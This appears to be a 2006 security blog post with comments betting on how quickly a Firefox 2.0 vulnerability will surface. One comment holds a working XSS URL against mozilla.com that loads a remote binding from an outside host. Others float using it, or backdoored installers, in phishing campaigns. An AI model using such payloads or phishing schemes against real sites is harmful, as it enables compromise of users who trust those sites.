On the heals of the Internet Explorer 7 release, comes the much anticipated
Firefox 2.0. Officially released tommorrow. Every new major browser release brings new interest from the security research community looking for greener pastures. In IE7 the
time-to-first-disclosed-vuln was under 24 hours. What do you think it'll be for FF2.0? I'll say
3 days, post your guess below.
48 hours.
ReplyDelete48 hours.
ReplyDeletei'll go with 5 days.. and zero for their website
ReplyDeletehttp://www.mozilla.com/en-US/products/download.html?product=-%22%20style%3D%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%3bxx:expression(alert('XSS'))%22%3E%3Cx%20&os=1&lang=1
(easier to just click my name)
well nevermind, bloggers a pain in multiple ways.. but you get the idea..
ReplyDelete*points to:*
http://sla.ckers.org/forum/read
.php?3,44,2090,page=21#msg-2090
Maluc, you rock...
ReplyDeleteUsing that, you can potentially load .xpi through phishing... eesh!
I give it less than a week (and if I worked for Microsoft I'd make sure of that).
Nevermind you need to find one in addons.mozilla.org or update.mozilla.org, Maluc. At least if you want to be super sneaky.
ReplyDeleteheh, i'll see what i can do..
ReplyDeletebut in the meantime, sending phishing emails advertising Firefox 2 with links to mozilla that downloads a backdoored install file could work pretty well too. That's a badly worded sentence but u get the idea..
well.. i found one on addons.mozilla.org .. and persistent. But, don't the victims still need to press the install button for them to be downloaded..? Also, the .xpi files look to be hosted on releases.mozilla.org
ReplyDeleteSo it can definitely be used for phishing if they can be convinced to click install.. but i'm not sure about an automatic way
less than that: http://lcamtuf.coredump.cx/ffoxdie.html
ReplyDeleteThe exploitable part of ffoxdie was fixed in the 1.5.0.7 release. What remains is a stack recursion crash due to an insanely deep XML tree.
ReplyDeleteYou can annoy someone, but does not appear exploitable. https://bugzilla.mozilla.org/show_bug.cgi?id=348514
Not that that's an excuse for leaving a highly publicised crash in the browser
ReplyDeleteffoxdie also affects IE7
ReplyDeleteWhat do you call a vuln? Do you simply mean security related bugs or must there be for example a code execution possibility?
ReplyDeleteRegards,
Sven
24 hours for 1st vuln disclosure
ReplyDelete32 hours for 1st p0c
48 hours for 1st use of above vuln by phishers/spammers
52 hours for 1st moan by security blog
53 hours for 1st moan by nerd camp
Call me old, but history repeats itself when it comes to software :0)
Either is fine by me. No need to quibble over sematics.
ReplyDeleteOk, let's start with something not so difficult. I've posted in my Blog at www.disenchant.ch two ways how someone can bypass the new phishing-filter very easy.
ReplyDeleteI found these two ways in about 30 minutes so it shouldn't be such a problem to find more ways.
PS:The first one isn't very interesting I know :P
Regards,
Sven
It seems like there was an anomaly in my Firefox. Option 2. will not work in the way I described in my Blog. It’s interesting anyway that the message which says that it’s a phishing site poping up about one second later as it does if you directly navigate to the same site. Sorry for false alarm :(
ReplyDelete4 days
ReplyDelete- zeno